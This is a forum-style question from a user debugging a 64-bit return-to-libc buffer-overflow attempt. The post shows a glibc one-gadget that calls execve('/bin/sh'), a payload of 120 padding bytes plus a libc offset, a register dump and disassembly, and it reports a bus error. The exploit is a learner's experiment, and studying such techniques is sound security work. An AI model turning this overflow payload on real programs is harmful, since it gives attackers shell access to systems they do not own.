Good day guys, I want to perform return-to-libc on a 64-bit architecture using execve. I found a gadget with /bin/sh in it (the /bin/sh offset is 18a143):
```
cbcd8: 00 00
cbcda: 4c 89 ea                mov    rdx,r13
cbcdd: 4c 89 e6                mov    rsi,r12
cbce0: 48 8d 3d 5c e4 0b 00    lea    rdi,[rip+0xbe45c]   # 18a143 <_libc_intl_domainname@@GLIBC_2.2.5+0x17e>
cbce7: e8 94 f9 ff ff          call   cb680 <execve@@GLIBC_2.2.5>
--
cbd92: 48 85 c0                test   rax,rax
```
Now I fill the return address (RIP) with (address of libc + 0xcbce0) using this payload:

```
r $(python -c 'print "A"*120 + {libc+0xcbce0}')
```

Here are the registers:
```
RAX: 0xffffffffffffffff
RBX: 0x0
RCX: 0xffffffffffffff80
RDX: 0x0
RSI: 0x555555555060 (<_start>: xor ebp,ebp)
RDI: 0x7ffff7f79143 --> 0x68732f6e69622f ('/bin/sh')
RBP: 0x4141414141414141 ('AAAAAAAA')
RSP: 0x0
RIP: 0x7ffff7ebacef (<maybe_script_execute+175>: mov rax,QWORD PTR [rbp-0x28])
R8 : 0xffffffff
R9 : 0x8a
R10: 0x7fffffffdfb0 ('A' <repeats 120 times>, "443777")
R11: 0x202
R12: 0x555555555060 (<_start>: xor ebp,ebp)
R13: 0x0
R14: 0x0
R15: 0x0
```
And here is the code around execve:
```
0x7ffff7ebace0 <maybe_script_execute+160>: lea    rdi,[rip+0xbe45c]        # 0x7ffff7f79143
0x7ffff7ebace7 <maybe_script_execute+167>: call   0x7ffff7eba680 <execve>
0x7ffff7ebacec <maybe_script_execute+172>: mov    rsp,rbx
0x7ffff7ebacef <maybe_script_execute+175>: mov    rax,QWORD PTR [rbp-0x28]
0x7ffff7ebacf3 <maybe_script_execute+179>: sub    rax,QWORD PTR fs:0x28
0x7ffff7ebacfc <maybe_script_execute+188>: jne    0x7ffff7ebad4b <maybe_script_execute+267>
0x7ffff7ebacfe <maybe_script_execute+190>: lea    rsp,[rbp-0x18]
0x7ffff7ebad02 <maybe_script_execute+194>: pop    rbx
```
But it does not work and gives a Bus Error. Thanks for your help.